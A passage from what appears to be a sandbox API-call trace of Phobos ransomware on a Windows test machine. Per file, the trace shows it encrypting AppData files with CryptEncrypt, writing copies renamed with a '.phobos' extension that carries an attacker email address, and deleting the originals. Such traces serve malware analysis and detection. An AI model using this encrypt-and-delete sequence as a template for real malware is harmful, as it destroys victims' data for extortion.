dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0197.908] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32828) returned 1 [0197.908] CryptSetKeyParam (hKey=0xa32828, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.908] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x186, lpOverlapped=0x0) returned 1 [0197.909] CryptEncrypt (in: hKey=0xa32828, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x190, dwBufLen=0x190 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x190) returned 1 [0197.909] WriteFile (in: hFile=0x118, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x190, lpOverlapped=0x0) returned 1 [0197.910] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0197.910] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.910] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0197.910] CryptDestroyKey (hKey=0xa32868) returned 1 [0197.910] WriteFile (in: hFile=0x118, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0197.910] CryptDestroyKey (hKey=0xa32828) returned 1 [0197.910] CloseHandle (hObject=0x180) returned 1 [0197.910] CloseHandle (hObject=0x118) returned 1 [0197.910] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1")) returned 1 [0197.911] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0197.911] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0197.915] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=386) returned 1 [0197.915] CloseHandle (hObject=0x118) returned 1 [0197.915] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e")) returned 0x2024 [0197.915] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.915] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0197.915] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.915] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.915] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0197.916] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32828) returned 1 [0197.916] CryptSetKeyParam (hKey=0xa32828, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.916] ReadFile (in: hFile=0x118, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x182, lpOverlapped=0x0) returned 1 [0197.917] CryptEncrypt (in: hKey=0xa32828, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x190, dwBufLen=0x190 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x190) returned 1 [0197.917] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x190, lpOverlapped=0x0) returned 1 [0197.918] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0197.918] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.918] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0197.918] CryptDestroyKey (hKey=0xa32868) returned 1 [0197.918] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0197.918] CryptDestroyKey (hKey=0xa32828) returned 1 [0197.918] CloseHandle (hObject=0x118) returned 1 [0197.918] CloseHandle (hObject=0x180) returned 1 [0197.918] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e")) returned 1 [0197.919] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0197.919] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0197.924] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=386) returned 1 [0197.924] CloseHandle (hObject=0x180) returned 1 [0197.924] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4")) returned 0x2024 [0197.924] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.924] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0197.924] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.924] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.924] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0197.925] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32828) returned 1 [0197.925] CryptSetKeyParam (hKey=0xa32828, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.925] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x182, lpOverlapped=0x0) returned 1 [0197.926] CryptEncrypt (in: hKey=0xa32828, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x190, dwBufLen=0x190 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x190) returned 1 [0197.926] WriteFile (in: hFile=0x118, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x190, lpOverlapped=0x0) returned 1 [0197.927] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0197.927] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.927] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0197.927] CryptDestroyKey (hKey=0xa32868) returned 1 [0197.927] WriteFile (in: hFile=0x118, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0197.927] CryptDestroyKey (hKey=0xa32828) returned 1 [0197.927] CloseHandle (hObject=0x180) returned 1 [0197.927] CloseHandle (hObject=0x118) returned 1 [0197.927] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4")) returned 1 [0197.928] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0197.928] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0197.929] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=386) returned 1 [0197.929] CloseHandle (hObject=0x118) returned 1 [0197.929] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778")) returned 0x2024 [0197.929] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.929] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0197.929] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.929] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.929] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.252] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ce8) returned 1 [0198.252] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0198.252] ReadFile (in: hFile=0x118, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x182, lpOverlapped=0x0) returned 1 [0198.253] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x190, dwBufLen=0x190 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x190) returned 1 [0198.253] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x190, lpOverlapped=0x0) returned 1 [0198.254] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328a8) returned 1 [0198.254] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0198.254] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0198.254] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.254] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0198.254] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.254] CloseHandle (hObject=0x118) returned 1 [0198.254] CloseHandle (hObject=0x140) returned 1 [0198.255] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778")) returned 1 [0198.298] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0198.298] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0198.299] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=185344) returned 1 [0198.299] CloseHandle (hObject=0x130) returned 1 [0198.299] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi")) returned 0x2020 [0198.299] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0198.299] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0198.299] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0198.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0198.320] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa329e8) returned 1 [0198.320] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0198.320] ReadFile (in: hFile=0x130, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x2d400, lpOverlapped=0x0) returned 1 [0198.575] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2d410, dwBufLen=0x2d410 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2d410) returned 1 [0198.576] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2d410, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x2d410, lpOverlapped=0x0) returned 1 [0198.580] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32aa8) returned 1 [0198.580] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0198.580] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0198.580] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0198.580] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe2, lpOverlapped=0x0) returned 1 [0198.580] CryptDestroyKey (hKey=0xa329e8) returned 1 [0198.580] CloseHandle (hObject=0x130) returned 1 [0198.581] CloseHandle (hObject=0x160) returned 1 [0198.581] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi")) returned 1 [0198.583] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0198.583] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0198.584] GetFileSizeEx 